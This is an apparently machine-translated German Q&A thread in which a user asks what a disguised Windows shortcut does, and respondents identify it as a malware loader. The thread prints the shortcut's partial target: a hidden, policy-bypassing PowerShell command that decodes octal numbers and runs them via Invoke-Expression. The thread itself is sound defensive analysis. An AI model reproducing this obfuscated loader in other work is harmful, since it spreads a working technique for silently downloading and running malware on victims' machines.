Was macht dieser Link speziell oder ist es ein Virus?

1219
Erik

In Windows 10 habe ich diese Datei heruntergeladen, von der ich dachte, dass sie ein Film ist, aber es war eine Abkürzung mit einer Größe von 700 MB

Ich sehe, dass das Ziel dies ist

C: \ Windows \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe -NoPr -WINd 1 -eXEc ByP. ($ pshOmE [4] + $ PShoMe [30] + 'X') (-JoiN ((44, 141, 163, 160, 170, 40, 75, 40, 50,50, 116, 145, 167,55, 117) 142, 152, 145, 143, 164, 40, 123, 171, 163, 164, 145, 155, 56, 116

Und es sollte losgehen

% SYSTEMROOT% \ System32 \ WindowsPowerShell \ v1.0

Was tut es?

6
-nopr, -wind & byp sind alle ziemlich beängstigend ... Die Zahlen bilden eine etwas verschobene URL, aber ich habe nicht das Wissen, um herauszufinden, worauf es ankommt. spikey_richie vor 5 Jahren 1
danke, ich habe tatsächlich auf den link geklickt, die Powershell knallte kurz auf, das ist alles bisher Erik vor 5 Jahren 0
Es ist offensichtlich eine Art Malware. Die Ziffern sind Oktalzahlen, die in '$ aspx =' (New-Object System.N`) übersetzt werden, aber es müsste noch viel mehr davon benötigt werden, um herauszufinden, wozu es bestimmt ist. Wenn ein Trojaner installiert wurde Wenn Sie die Verbindung zum Internet trennen, den Computer neu starten (nicht neu starten) und einen vollständigen Virenscan durchführen (einschließlich Root-Kit-Scan), kann dies je nach Beschaffenheit des Computers auftreten andere Systeme in Ihrem Netzwerk. AFH vor 5 Jahren 7
Ich habe McaFee liveSafe Premium, aber es hat nicht reagiert Erik vor 5 Jahren 0
Ein ähnlicher verschleierter Code ist [hier] dokumentiert (https://www.hybrid-analysis.com/sample/afe37a79b49e80d09ab51400c291cb9d50b73cc561bb409c1d7b9c7b9c7bc3b002d0/5b28c36b7ca3e11c94574b5). AFH vor 5 Jahren 1

1 Antwort auf die Frage

9
Michał Sacharewicz

Es ist ein Malware-Loader.

Es führt einen Powershell-Code aus, der mit New-Object System.N...(in den Nummern versteckt ) beginnt, was in vollem Umfang der ist New-Object System.Net.WebClient, der dazu verwendet wird, die eigentliche Malware von der URL herunterzuladen und auszuführen, die auch in den weiteren Nummern des verschleierten Codes versteckt ist.

Wenn Sie bereits auf den Link geklickt haben, sind Sie wahrscheinlich bereits infiziert, es sei denn, die URL wurde bereits entfernt.

Sie können versuchen, Ihre Zeile in den Notizblock einzufügen und alles vorher zu löschen ( -JoiN( (, den restlichen Teil (beginnend mit ( -JoiN( (...) zu kopieren und in das PowerShell-Fenster einzufügen. Es wird den verschleierten PowerShell-Code offen legen, der normalerweise vom vorhergehenden $pshOmE[4]+$PShoMe[30]+'X')= iex= ausgeführt wird Invoke-Expression.

Vielen Dank, ich habe diesen Code erhalten: ** 4414116316017040755050116145167551171421521451431644012317116316414515556116 ** Wie kann ich etwas aus diesem Code herausfinden? Erik vor 5 Jahren 0
In der Verknüpfungsdatei befinden sich wahrscheinlich weitere Teile des Codes (z. B. die tatsächliche URL), die an den Befehl angehängt werden, wenn die Verknüpfung ausgeführt wird. trognanders vor 5 Jahren 1
Bitte geben Sie den vollständigen Code inkl. Kommas Michał Sacharewicz vor 5 Jahren 0
Das ist der Code, den ich nach Ihren Anweisungen erhalten habe, 441411631601704075405050116 ..... Erik vor 5 Jahren 0
Du verpasst was. Bitte fügen Sie den gesamten Code ein. Michał Sacharewicz vor 5 Jahren 0